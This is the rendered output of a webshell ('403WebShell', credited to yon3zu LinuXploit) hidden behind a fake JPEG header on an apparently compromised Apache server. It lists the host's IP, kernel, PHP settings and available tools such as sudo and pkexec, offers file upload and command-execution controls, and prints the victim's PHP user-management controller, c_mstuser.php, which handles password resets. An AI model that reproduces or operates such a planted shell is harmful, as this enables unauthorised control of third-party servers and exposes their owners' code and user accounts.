����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 3.137.163.99
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/app6/application/utility/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/app6/application/utility/c_mstuser.php
<?php
session_start();
require_once ("../model/dbconn.php");
require_once ("../model/pos.php");
$method=$_POST['method'];
if( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) && ( $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ) )
{
	$pos = new pos();
	if($method == 'delete_user'){
		$id_user=strtoupper($_POST['id_user']);
		$pos = new pos();
		$array = $pos->deleteUser($id_user);
		$data['result'] = $array[0];
		$data['error'] = $array[1];
		echo json_encode($data);
	}

	if($method == 'getdata'){
		$pos = new pos();
		$array = $pos->getListUser();
		$data = $array[1];
		
		//almacenes
		$posStock = new pos();
		$i=0;
		foreach ($data as $key) {
			
			
			
			$data[$i]['stock_id'] = "almacen - ".$key['stock_id']."";
			
			$data[$i]['button'] = '
			<button type="submit" id_user="'.$key['id_user'].'" class="btn btn-warning btnpass  btn-sm" id="btnpass'.$key['id_user'].'"  ><i class="fa fa-key"></i>
			</button>
			<button type="submit" id_user="'.$key['id_user'].'" username="'.$key['username'].'" h_menu="'.$key['h_menu'].'" stock_id="'.$key['stock_id'].'" class="btn btn-primary btnedit btn-sm " id="btnedit'.$key['id_user'].'"  ><i class="fa fa-edit"></i>
			</button>
			<button type="submit" id_user="'.$key['id_user'].'" class="btn  btn-danger btndelete  btn-sm " id="btndelete'.$key['id_user'].'" ><i class="fa fa-remove"></i>
				</button';


				$i++;
			}
			$datax = array('data' => $data);
			echo json_encode($datax);
		}

		if($method == 'reset_password')
		{
			$id_user= $_POST['id_user'];
			$newpass = $_POST['new_pass'];
			$pos = new pos();
			$array = $pos->resetPass($id_user,$newpass);
			$result['result'] = $array[0];
			$result['error'] = $array[1];

			echo json_encode($result);
		}

		if($method == 'save_user'){
			$id_user=$_POST['id_user'];
			$username=strtoupper($_POST['username']);
			$pass_user=strtoupper($_POST['pass_user']);
			$h_menu=strtoupper($_POST['h_menu']);
			$stock_id=strtoupper($_POST['stock_id']);
			$pos = new pos();
			if($_POST['crud'] == 'N'){
				$array = $pos->saveUser($username,$pass_user,$h_menu,$stock_id);
			}else{
				$array = $pos->updateUser($id_user,$username,$h_menu,$stock_id);
			}
			$result['result'] = $array[0];
			$result['error'] = $array[1];
			$result['crud'] = $_POST['crud'];
			echo json_encode($result);
		}
	} else {
		exit('No direct access allowed.');
	}

Youez - 2016 - github.com/yon3zu
LinuXploit